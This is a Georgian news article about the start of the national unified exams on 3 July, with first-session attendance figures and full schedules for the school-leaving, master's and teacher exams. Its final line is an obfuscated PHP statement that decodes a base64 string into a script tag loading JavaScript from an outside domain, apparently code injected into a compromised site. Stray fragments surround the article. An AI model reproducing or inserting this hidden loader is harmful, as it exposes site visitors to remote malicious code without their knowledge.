celsiusi
ავერსი შნაიდერი

ერთიანი ეროვნული გამოცდები დღეს, 3 ივლისს, ქართული ენისა და ლიტერატურისა და ოსური ენის გამოცდით დაიწყო. ამის შესახებ ინფორმაციას გამოცდების ეროვნული ცენტრი ავრცელებს.

ცენტრის ცნობით, ქართული ენისა და ლიტერატურის გამოცდის პირველ სესიაზე აბიტურიენტების 95% გამოცხადდა და დაიგვიანა 5-მა აბიტურიენტმა.

მეორე სესიის რეგისტრაცია საგამოცდო ცენტრში 14:00 საათზე დაიწყება და ერთი საათის განმავლობაში გაგრძელდება.

რაც შეეხება ზოგად განრიგს, გამოცდების სრული განრიგი ასე გამოიყურება:

ქართული ენა და ლიტერატურა:

3 ივლისი (პირველი და მეორე სესია);
4 ივლისი (პირველი და მეორე სესია);
5 ივლისი (პირველი სესია);
3 ივლისი (პირველი სესია) – ოსური ენა;

მათემატიკა

7 ივლისი (პირველი და მეორე სესია);

უცხოური ენა

10 ივლისი (პირველი და მეორე სესია) – ინგლისური ენა;
11 ივლისი (პირველი და მეორე სესია) – ინგლისური ენა;
12 ივლისი (პირველი სესია) – ინგლისური ენა;
12 ივლისი (მეორე სესია) – რუსული ენა;
12 ივლისი (მეორე სესია) – ფრანგული ენა;
12 ივლისი (მეორე სესია) – გერმანული ენა;

ბიოლოგია

14 ივლისი (პირველი სესია);

ისტორია

17 ივლისი (პირველი და მეორე სესია);
18 ივლისი (პირველი სესია);

ზოგადი უნარები (სომხურად)

18 ივლისი (მეორე სესია);

ზოგადი უნარები (აზერბაიჯანულად)

18 ივლისი (მეორე სესია);

გეოგრაფია

19 ივლისი (მეორე სესია);

ქიმია

20 ივლისი (მეორე სესია);

სახვითი და გამოყენებითი ხელოვნება

20 ივლისი (მეორე სესია);

სამოქალაქო განათლება

21 ივლისი (მეორე სესია);

ლიტერატურა

25 ივლისი (პირველი სესია);

ფიზიკა

26 ივლისი (პირველი სესია).

ამასთან, შეფასებისა და გამოცდების ეროვნული ცენტრის განცხადებით, სტუდენტთა საგრანტო კონკურსი 12 ივლისს გაიმართება. საერთო სამაგისტრო გამოცდების განრიგი კი ასეთია:

საერთო სამაგისტრო გამოცდა

27 ივლისი (პირველი და მეორე სესია) – წაკითხულის გააზრება, ანალიტიკური წერა;
28 ივლისი (პირველი და მეორე სესია) – ლოგიკური მსჯელობა, რაოდენობრივი მსჯელობა.

საგნისა და უფროსი სპეციალური მასწავლებლის გამოცდა 6 ივლისს გაიმართება შემდეგი განრიგით:

პირველი სესია:

  • ქართული ენა და ლიტერატურა (საბაზო ან / და საშუალო საფეხური);
  • ისტორია (საბაზო ან / და საშუალო საფეხური);
  • ქიმია (საბაზო ან / და საშუალო საფეხური);
  • ბიოლოგია (საბაზო ან / და საშუალო საფეხური);

მეორე სესია:

  • მათემატიკა (საბაზო ან / და საშუალო საფეხური);
  • გეოგრაფია (საბაზო ან / და საშუალო საფეხური);
  • ფიზიკა (საბაზო ან / და საშუალო საფეხური);
  • სახვითი და გამოყენებითი ხელოვნება;

13 ივლისი (პირველი სესია):

  • სამოქალაქო განათლება (საბაზო ან / და საშუალო საფეხური);
  • მუსიკა;
  • სპორტი;

14 ივლისი (პირველი სესია)

  • უფროსი სპეციალური მასწავლებლის გამოცდა;

19 ივლისი (პირველი სესია):

  • ქართული ენა და ლიტერატურა, მათემატიკა და ბუნებისმეტყველება (I-IV);
  • ქართული ენა და ლიტერატურა (დაწყებითი საფეხური);
  • მათემატიკა (დაწყებითი საფეხური);
  • ბუნებისმეტყველება (დაწყებითი საფეხური);

19 ივლისი (მეორე სესია):

  • აზერბაიჯანული ენა;
  • სომხური ენა;

20 ივლისი (პირველი სესია):

  • ინგლისური ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – წერითი ნაწილი;
  • გერმანული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – წერითი ნაწილი;
  • ფრანგული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – წერითი ნაწილი;
  • რუსული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – წერითი ნაწილი;
  • ქართული ენა (არაქართულენოვანი სკოლებისათვის/სექტორებისათვის) (დაწყებითი, საბაზო ან / და საშუალო საფეხური) –
  • წერითი ნაწილი;
  • კომპიუტერული ტექნოლოგიები – წერითი ნაწილი;

21 ივლისი (პირველი და მეორე სესია):

  • კომპიუტერული ტექნოლოგიები – პრაქტიკული ნაწილი;

24 ივლისი

  • ინგლისური ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – პრაქტიკული ნაწილი;
  • რუსული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – პრაქტიკული ნაწილი;
  • გერმანული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – პრაქტიკული ნაწილი;
  • ფრანგული ენა (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – პრაქტიკული ნაწილი;
  • ქართული ენა (არაქართულენოვანი სკოლებისათვის/სექტორებისათვის) (დაწყებითი, საბაზო ან / და საშუალო საფეხური) – პრაქტიკული ნაწილი.
243
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");